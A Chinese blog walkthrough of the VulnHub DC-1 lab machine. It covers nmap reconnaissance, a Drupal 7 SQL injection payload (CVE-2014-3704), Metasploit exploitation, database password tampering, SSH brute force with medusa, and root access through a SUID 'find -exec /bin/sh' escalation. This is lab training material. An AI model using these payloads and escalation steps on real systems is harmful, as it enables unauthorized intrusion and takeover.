DC-1 靶机渗透测试流程

最新推荐文章于 2024-07-25 10:34:33 发布
最新推荐文章于 2024-07-25 10:34:33 发布
阅读量109 收藏
点赞数
文章标签: 网络 linux 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/131740291
版权
文章描述了一次针对靶机的渗透测试过程,从信息收集开始,利用sudonmap进行端口扫描,发现SQL注入漏洞。通过漏洞利用获取shell,进一步挖掘Drupal配置文件得到数据库信息。利用数据库信息篡改密码并登录后台获取flag。之后通过查找SUID权限文件,利用find命令提权至root用户,最终找到最终的flag。
摘要由CSDN通过智能技术生成

靶机下载地址

DC: 1 ~ VulnHub

信息收集

主机探测

sudo nmap -sn 10.10.10.0/24    

发现目标靶机IP地址10.10.10.5

初步扫描

 

sudo nmap -sT --min-rate 10000 -p- 10.10.10.5

可知以下信息

22/tcp    open  ssh

80/tcp    open  http

111/tcp   open  rpcbind

50382/tcp open  unknown

 详细信息扫描

sudo nmap -sT -sC -sV -O -p 22,80,111,50382 10.10.10.5  

可知以下信息

22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)

80/tcp    open  http    Apache httpd 2.2.22 ((Debian))

111/tcp   open  rpcbind 2-4

50382/tcp  open

Running: Linux 3.X

| http-robots.txt: 36 disallowed entries (15 shown)

| /includes/ /misc/ /modules/ /profiles/ /scripts/

| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt

| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt

|_/LICENSE.txt /MAINTAINERS.txt

漏洞脚本扫描 

可知以下信息

| http-enum:                                              

|   /rss.xml: RSS or Atom feed                            

|   /robots.txt: Robots file                              

|   /UPGRADE.txt: Drupal file

|   /INSTALL.txt: Drupal file                                                                                        

|   /INSTALL.mysql.txt: Drupal file

|   /INSTALL.pgsql.txt: Drupal file

|   /: Drupal version 7                                   

|   /README: Interesting, a readme.

|   /README.txt: Interesting, a readme.

|   /0/: Potentially interesting folder

|_  /user/: Potentially interesting folder

80端口存在SQL注入cve2014-3704:

UDP扫描 

sudo nmap -sU --top-ports 100 10.10.10.5

111/udp open  rpcbind

WEB指纹识别 

访问80端口发现是durpal CMS但是不知道版本号

渗透过程

flag1

发现存在SQL注入,是POST型报错注入。
payload
name[0||extractvalue(0,concat(0xa,database()),0)%23]=bob&name[0]=a&pass=bug&form_build_id=form-hUM-lGJvIc5NEmlo46nu_0Z7cOfyfmk6BQjvIRD4goA&form_id=user_login_block
&op=Log in

使用msfconsole获取shell

使用drupal_drupageddon

设置好RHOSTS和RPORT输入run即可获取到shell

 发现flag1.txt

flag2

查看durpal配置文件发现flag2和数据库账户和密码,提示我们不要暴力破解。

      'database' => 'drupaldb',                                                                                      

      'username' => 'dbuser',                                                                                        

      'password' => 'R0ck3t',  

 

flag3

登录数据库,查看用户表信息,确实我破解不出来。

 

 在/var/www目录下找到drupal的密码加密文件使用它得到自己的一个哈希值,然后修改表把admin的密码改了。

 

使用修改后的密码登录admin,可以看到成功登录。

发现flag3

告诉需要查看passwd和shadow文件的权限,并且可能需要使用find命令的-exec选项来找到某些信息。那这里大概率就是暗示我们要用SUID来提权了。

 

flag4

查看/etc/passwd发现flag4,发现flag4是一个可登录用户

 

使用medusa密码爆破,因为想不到其它方法能够提权,只能看能不能破解flag4的密码。

medusa -M ssh -h 10.10.10.5 -u flag4 -P /usr/share/wordlists/rockyou.txt -f -t 5

大概几分钟就能够得到密码orange

 使用flag4        orange成功登录用户flag4,id查看权限,仍然不能直接切换到root,还需要提权

thefinalflag

查找具有SUID权限的文件

find / -perm -4000 2>/dev/null|ls -l

发现find被设置了SUID权限

使用find进行提权

find . -exec /bin/sh \;

成功得到root用户,并且在root目录下得到了thefinalflag.txt。 

 

总结

本次渗透测试通过SQL注入漏洞拿到反弹shell,通过敏感文件获取数据库账号密码,获取表文件得到用户名和加密后的密码,通过篡改表密码登录到drupal后台获取flag3,查看/etc/passwd获取flag4,发现flag4是一个可登录用户,用medusa进行暴力破解登录,使用SUID提权。

Teardrop、
关注
DC-1靶机渗透测试
Liumx0105的博客
12-20 947
思路:信息收集→漏洞探测→漏洞利用→提权
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1233
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-1靶机渗透超详细笔记
最新发布
2301_79700060的博客
07-25 977
访问 https://vulnhub.com ,然后搜索 DC,点入后可以看到对靶机的介绍下载镜像文件。用 VM 打开,把网络模式改为 nat 模式。然后开启虚拟机。
DC-1靶机进行渗透测试
zll___的博客
03-11 1025
DC-1靶机进行渗透测试
DC1靶机渗透测试
Huangshanyoumu的博客
04-16 772
Vuln hub 渗透测试实战 Vulnhub是一个开放的安全靶场,我们可以使用它所提供的环境进行渗透测试实战。 DC所有环境下载地址:https://www.vulnhub.com/series/dc,199/ 环境搭建: 1.下载 OVA(Open Virtualization Appliance:开放虚拟化设备)https://www.vulnhub.com/entry/dc-1-1,292/ 2.拖入 VMware 打开,配置相关设置,开启运行 3.打开 Kali Linux 进行渗透 1.探测
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1428
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
DC-1靶机渗透详细过程(附靶机连接)
bwt_D的博客
05-19 794
查看本机的ip地址 使用nmap进行ip地址扫描,确定靶机的IP nmap -sP 192.168.159.1/24 对其进行详细扫描 nmap -A 192.168.159.140 -p 1-65535 80端口开放,直接使用浏览器访问 使用MSF搜索该网页模板存在的漏洞 msfconsole search drupal 使用第四个攻击模块 use exploit/unix/webapp/drupal_drupalgeddon2 选择攻击载荷 set payload php/meterpreter
【VulnHub靶机渗透】六:DC-2
野原新之助
04-25 682
靶机设定线索引导用户得到相关信息,存在弱口令和sudo权限配置不当等安全问题。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
9.100个渗透测试实战#9(DC-4)
01-09
世间一切皆可努力  感谢浏览 目录 ...二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面; 3.探测特
Vulnhub DC系列之DC-1靶机渗透测试
Alexhirchi的博客
08-16 416
启动DC-1靶机,界面显示登录界面,这是正常运行情况,我们也并没有登录账号,需要自己去渗透测试进行提权。回到我们的攻击机, 扫描内网,发现主机 (1)扫描内网,发现目标主机IP 使用命令:arp-scan -l 发现内网中的主机: 扫描主机 (2)利用nmap对目标主机进行端口扫描,发现开放端口 使用命令:nmap -sV -p- 192.168.43.144 -sV 用来扫描目标主机和端口上运行的软件的版本 -p 80 指定80端口 -p- 扫描0-65535全部端口 发现开放80端口,则可以
渗透测试DC-1靶机
Ciyaso的博客
08-06 353
一、扫描获取靶机ip 方法一 1.使用 ip add 查看kali ip 192.168.203.130 2.用nmap扫描192.168.203.0/24以获取靶机ip nmap -sP 192.168.203.0/24 得到ip 192.168.203.138 方法二 arp-scan -l 得到ip 192.168.203.138 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.138 可以看到,开放了三个端口22、80、111 其中80端口中存
一次DC1靶机渗透测试
8888的博客
06-23 988
原因:若是对一些特殊命令设置了SUID,那么就会有被提权的风险,常用的SUID提权命令有nmap、vim、find、bash、more、less、nano、awk和cp等。让我们提权,得到root用户,那么返回我们的命令行,这里提权我们可以利用的是find。发现管理员用户和密码,但是不知道密码是什么,在这里,采用密码替换。因为这是一个Drupal的管理系统,那么我们搜索是否有这个漏洞。那么我们试一下是否有权限,我们新建一个文件,然后进行命令执行。正好发现了一个我们之前获得的数据库名,那么,我们切换数据库。
渗透测试靶机 MMMystery-DC1
weixin_46128614的博客
01-01 226
DC-1 Author:MMMystery 靶机下载: vulnhub-DC1 nmap -sT -sV -p- -T5 x.x.x.x 发现22和80端口 浏览器访问80端口,发现Drupal框架 搜索漏洞 尝试利用 use 4 set rhost x.x.x.x run 然后就进入了meterpreter 再输入python -c "import pty;pty.spawn('/bin...
渗透测试DC-1靶机实战(下)SSH爆破提权
m0_74313947的博客
06-05 475
SSH(Secure Shell):这是一种加密的网络协议,用于在不安全网络中为两个远程系统提供安全的加密通信。SSH 允许用户通过命令行界面远程登录到其他系统,并在远程系统上执行各种操作,它提供了更全面和系统级的访问和控制权限。Webshell:它是一种网页后门程序,通常是通过利用网站漏洞将恶意脚本文件上传到目标网站服务器上,然后可以通过浏览器等方式与该脚本进行交互,从而执行一些服务器端的操作,比如查看文件、执行命令等,但它主要是基于 Web 环境进行操作。
Neos的渗透测试靶机练习——DC-1
qq_38678845的博客
01-07 931
渗透测试靶机练习
DC-1靶机渗透测试记录
qq_33163046的博客
12-18 9705
攻击机 kali-linux-2020.4-vbox-i386 设置 USB设备关闭,网络连接方式仅主机(Host-Only)网络。 攻击机IP 192.168.56.103 步骤1 靶机目标发现 因为靶机和攻击机在同一个网络内,所以使用KALI上arp-scan -l 进行扫描。扫描确定了靶机的IP是192.168.56.102。 ┌──(root??kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:83:c
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值